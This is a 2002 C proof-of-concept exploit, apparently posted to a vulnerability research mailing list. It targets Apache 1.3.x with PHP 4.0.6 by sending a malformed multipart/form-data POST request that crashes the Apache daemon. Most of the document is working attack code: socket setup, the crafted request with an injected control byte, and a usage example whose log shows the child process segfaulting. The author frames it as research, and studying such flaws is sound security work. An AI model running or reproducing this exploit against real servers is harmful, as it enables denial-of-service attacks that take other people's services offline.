/* --------------------------------------------------------------------------- Web: http://qb0x.net Author: Gabriel A. Maggiotti Date: Febrary 03, 2002 E-mail: gmaggiotat_private --------------------------------------------------------------------------- Summary ------- This is a proof of concept exploit for Apache/1.3.x + php_4.0.6. This code exploit multipart/form-data POST requests bug. This code only crash apache deamon, not open any shell or execute code in the remote server. PHP supports multipart/form-data POST requests (as described in RFC1867) known as POST fileuploads. Unfourtunately there are several flaws in the php_mime_split function that could be used by an attacker to execute arbi- trary code. I dont know if the vuln I exploit is a known vuln or not. Example: ------- <quote> [gabi@pluto logs]$ ./apache_php host 80 hi.php [gabi@pluto logs]$ cat /www/logs/error_log [Sun Mar 3 02:50:36 2002] [notice] child pid 26856 exit signal Segmentation fault (11) [gabi@pluto logs]$ </quote> Greets: ------ A special greets to Fernando Oubi#a and Sebastian Brocher, good friend of mime. A very special greets for a good friend and an excellent Security Consultant Alex Hernandez!!! */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/wait.h> #include <unistd.h> #include <fcntl.h> #define MAX 1000 #define PORT 80 char *str_replace(char *rep, char *orig, char *string) { int len=strlen(orig); char buf[MAX]=""; char *pt=strstr(string,orig); strncpy(buf,string, pt-string ); strcat(buf,rep); strcat(buf,pt+strlen(orig)); strcpy(string,buf); return string; } int main(int argc,char *argv[MAX]) { int sockfd; int numbytes; int port; char *ptr; char POST_REQUEST[MAX] = "POST ##file HTTP/1.0\n" "Referer: http://host/xxxxxx/exp.php?hi_lames=haha\n" "Connection: Keep-Alive\nContent-type: multipart/for" "m-data; boundary=---------------------------1354088" "10612827886801697150081\nContent-Length: 567\n\n---" "--------------------------1354088106128278868016971" "50081\nContent-Disposition: form-data; name=\"\x8\""; struct hostent *he; struct sockaddr_in their_addr; if(argc!=4) { fprintf(stderr,"usage:%s <hostname> <port> <php_file>\n",argv[0]); exit(1); } port=atoi(argv[2]); ptr=str_replace(argv[3],"##file",POST_REQUEST); //ptr=POST_REQUEST; if((he=gethostbyname(argv[1]))==NULL) { perror("gethostbyname"); exit(1); } if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) { perror("socket"); exit(1); } their_addr.sin_family=AF_INET; their_addr.sin_port=htons(port); their_addr.sin_addr=*((struct in_addr*)he->h_addr); bzero(&(their_addr.sin_zero),8); if( connect(sockfd,(struct sockaddr*)&their_addr,\ sizeof(struct sockaddr))==-1) { perror("connect"); exit(1); } if( send(sockfd,ptr,strlen(POST_REQUEST),0) ==-1) { perror("send"); exit(0); } close(sockfd); return 0; } /* --------------------------------------------------------------------------- research-listat_private is dedicated to interactively researching vulnerab- ilities, report potential or undeveloped holes in any kind of computer system. To subscribe to research-listat_private t send a blank email to research-list-subscribeat_private More help available sending an email to research-list-helpat_private Note: the list doesn't allow html, it will be stripped from messages. --------------------------------------------------------------------------- */
This archive was generated by hypermail 2b30 : Tue Mar 05 2002 - 17:49:43 PST